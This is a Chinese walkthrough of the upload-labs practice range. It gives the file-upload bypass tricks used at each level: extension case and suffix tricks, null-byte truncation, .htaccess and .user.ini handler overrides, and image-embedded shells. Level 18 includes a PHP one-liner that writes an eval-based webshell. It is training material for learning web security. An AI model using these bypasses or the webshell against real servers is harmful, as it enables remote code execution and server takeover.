upload-labs靶场通关(附靶场环境)

2024-09-01 13:04
文章标签 环境 靶场 upload labs 通关

本文主要是介绍upload-labs靶场通关(附靶场环境),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

链接: https://pan.baidu.com/s/1GQP5zthh598A4Mp-WQM4vA 提取码: zovn

环境搭建

步骤一:将环境附件下载到phpstudy_pro\WWW下面修改名字为upload

步骤二:询问绑定地址

第一关  less-1

步骤一:上传一句话木马

步骤二:更改文件名后缀,将1.php改为1.jpg,利用burp进行抓包

步骤三:更改为1.php进行放包,上传成功

右击图片打开新窗口找到php文件

第二关:less-2

步骤一:更改文件名后缀,将1.php改为1.jpg,利用burp进行抓包

步骤二:更改为1.php进行放包,上传成功

右击图片打开新窗口找到php文件

第三关:less-3

步骤一:php文件重命名为1.php5

步骤二:右击右击图片打开,进行蚁剑连连接

第四关:less-4

步骤一:创建一个.htaccess文件,里面输入内容

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php

</FilesMatch>

步骤二:先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第五关:less-5

步骤一:创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"

步骤二:先上传.user,ini文件,再上传1.jpg

步骤三:进行蚁剑连连接

第六关:less-6

步骤一:上传1.php抓包,将1.php改为1.phP,放行

第七关:less-7

步骤一:上传1.php抓包,将1.php后面加空格,放行

步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第八关:less-8

步骤一:上传1.php抓包,将1.php后面加.,放行

步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第九关:less-9

步骤一:上传1.php抓包,将1.php后面加::$DATA,放行

步骤二:图片右键新建标签页打开图片

第十关:less-10

步骤一:上传1.php文件抓包,1.php后面加.空格. 放行

步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第十一关:less-11

步骤一:将1.php改为1.pphphp


步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第十二关:less-12

步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行

步骤二:图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问

第十三关:less-13

步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg

步骤二:打开Hex,将6.php后面的空格对应的20改为00,放行

步骤三:图片右键新建标签页打开图片,删掉�/5320240830164829.jpg访问

第十四关:less-14

步骤一:将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+1.php/a shell.jpg

步骤二:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

第十五关:less-15

步骤一:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

第十六关:less-16

环境不支持

第十七关:less-17

步骤一:图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

步骤二:进行蚁剑连连接

第十八关:less-18

步骤一:php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

步骤二:上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

步骤三:访问1.php抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

步骤四:同时攻击,直到出现webshell.php

步骤五:访问webshell.php,进行蚁剑连连接

第二十关:less-20

步骤一上传php文件,保存名称改为1.php/.

这篇关于upload-labs靶场通关(附靶场环境)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


原文地址:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.chinasem.cn/article/1127010

相关文章

Centos环境下Tomcat虚拟主机配置详细教程

《Centos环境下Tomcat虚拟主机配置详细教程》这篇文章主要讲的是在CentOS系统上,如何一步步配置Tomcat的虚拟主机,内容很简单,从目录准备到配置文件修改,再到重启和测试,手把手带你搞定... 目录1. 准备虚拟主机的目录和内容创建目录添加测试文件2. 修改 Tomcat 的 server.X

VSCode配置Anaconda Python环境的实现

《VSCode配置AnacondaPython环境的实现》VisualStudioCode中可以使用Anaconda环境进行Python开发,本文主要介绍了VSCode配置AnacondaPytho... 目录前言一、安装 Visual Studio Code 和 Anaconda二、创建或激活 conda

pytorch+torchvision+python版本对应及环境安装

《pytorch+torchvision+python版本对应及环境安装》本文主要介绍了pytorch+torchvision+python版本对应及环境安装,安装过程中需要注意Numpy版本的降级,... 目录一、版本对应二、安装命令(pip)1. 版本2. 安装全过程3. 命令相关解释参考文章一、版本对

国内环境搭建私有知识问答库踩坑记录(ollama+deepseek+ragflow)

《国内环境搭建私有知识问答库踩坑记录(ollama+deepseek+ragflow)》本文给大家利用deepseek模型搭建私有知识问答库的详细步骤和遇到的问题及解决办法,感兴趣的朋友一起看看吧... 目录1. 第1步大家在安装完ollama后,需要到系统环境变量中添加两个变量2. 第3步 “在cmd中

Windows环境下安装达梦数据库的完整步骤

《Windows环境下安装达梦数据库的完整步骤》达梦数据库的安装大致分为Windows和Linux版本,本文将以dm8企业版Windows_64位环境为例,为大家介绍一下达梦数据库的具体安装步骤吧... 目录环境介绍1 下载解压安装包2 根据安装手册安装2.1 选择语言 时区2.2 安装向导2.3 接受协议

SpringBoot基于沙箱环境实现支付宝支付教程

《SpringBoot基于沙箱环境实现支付宝支付教程》本文介绍了如何使用支付宝沙箱环境进行开发测试,包括沙箱环境的介绍、准备步骤、在SpringBoot项目中结合支付宝沙箱进行支付接口的实现与测试... 目录一、支付宝沙箱环境介绍二、沙箱环境准备2.1 注册入驻支付宝开放平台2.2 配置沙箱环境2.3 沙箱

linux环境openssl、openssh升级流程

《linux环境openssl、openssh升级流程》该文章详细介绍了在Ubuntu22.04系统上升级OpenSSL和OpenSSH的方法,首先,升级OpenSSL的步骤包括下载最新版本、安装编译... 目录一.升级openssl1.官网下载最新版openssl2.安装编译环境3.下载后解压安装4.备份

Vue ElementUI中Upload组件批量上传的实现代码

《VueElementUI中Upload组件批量上传的实现代码》ElementUI中Upload组件批量上传通过获取upload组件的DOM、文件、上传地址和数据,封装uploadFiles方法,使... ElementUI中Upload组件如何批量上传首先就是upload组件 <el-upl

在Mysql环境下对数据进行增删改查的操作方法

《在Mysql环境下对数据进行增删改查的操作方法》本文介绍了在MySQL环境下对数据进行增删改查的基本操作,包括插入数据、修改数据、删除数据、数据查询(基本查询、连接查询、聚合函数查询、子查询)等,并... 目录一、插入数据:二、修改数据:三、删除数据:1、delete from 表名;2、truncate

VScode连接远程Linux服务器环境配置图文教程

《VScode连接远程Linux服务器环境配置图文教程》:本文主要介绍如何安装和配置VSCode,包括安装步骤、环境配置(如汉化包、远程SSH连接)、语言包安装(如C/C++插件)等,文中给出了详... 目录一、安装vscode二、环境配置1.中文汉化包2.安装remote-ssh,用于远程连接2.1安装2